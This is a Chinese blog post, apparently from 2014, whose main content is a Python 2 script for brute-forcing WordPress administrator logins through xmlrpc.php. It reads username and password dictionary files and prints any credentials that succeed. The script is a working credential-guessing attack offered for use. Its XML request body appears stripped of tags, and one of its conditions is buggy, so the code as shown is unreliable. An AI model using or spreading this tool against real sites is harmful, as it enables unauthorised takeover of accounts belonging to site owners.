根据freebuf代码修改,使用requests进行请求,中间使用连接符替换原有字符串相加,减少CPU运算量,以下为修改代码

# !/usr/bin/env python
#-*- coding: utf-8 -*-
#=============================================================================
#     FileName: wordpress_xmlrpc.py
#         Desc:
#       Author: 苦咖啡
#        Email: voilet@qq.com
#     HomePage: http://blog.kukafei520.net
#      Version: 0.0.1
#   LastChange: 2014-08-01
#      History: 
#=============================================================================
import requests

import re

def GetUrl():
    urlinput=raw_input("请输入wordpress站点:")
    requrl="http://"+re.match(r"(http://)?(.*)",urlinput).expand('\g<2>')+"/xmlrpc.php"
    print "尝试利用:"+requrl
    return requrl

def Aviable(requrl):
    """

    :param requrl:
    :return:
    """
    try:
        result = requests.get(requrl, timeout=5)
        if result.text == "XML-RPC server accepts POST requests only.":
            print "\n该站点存在此漏洞,尝试破解中:"
            return True

        else:
            return False
    except:

        print "抱歉,此站点漏洞不可用"
        return False



def Exploit():
    """
    说明:
    1.在本文件同目录下新建username.txt、password.txt分别存入用户名、密码字典
    2.按提示输入WordPress站点(例如:blog.kukafei520.net)

    """
    requrl = GetUrl()

    if Aviable(requrl):
        f_username = open("username.txt", "r")
        f_password = open("password.txt", "r")
        num = 0
        Flag = 0
        for name in f_username:
            if Flag == 1:
                break
            for key in f_password:
                if num == 0:
                    print "开始尝试...."
                else:
                    if num % 10 == 0:
                        print "已尝试"+str(num)+"个"
                reqdata='wp.getUsersBlogs\
                        '+ name + \
                        ''+ key  +\
                        ''

                req = requests.post(url=requrl, data=reqdata)
                result = req.text
                num = num+1

                if "isAdmin" in result:

                    hacker_data = "用户名: %s 密码: %s" % (name, key)
                    print hacker_data
                    Flag = 1

                    break

                elif "faultString" and "403" in result:
                    continue

                else:
                    print "Unknown error"
        f_username.close()
        f_password.close()
        if not Flag:
            print "抱歉,在此字典中未找到正确的密码"

if __name__ == '__main__':
    print Exploit.__doc__
    Exploit()


分享到: 更多

这篇日志的 QR 二维码为:

八月 1st, 2014

Posted In: 网络技术

发表评论

电子邮件地址不会被公开。 必填项已用*标注

无觅相关文章插件,快速提升流量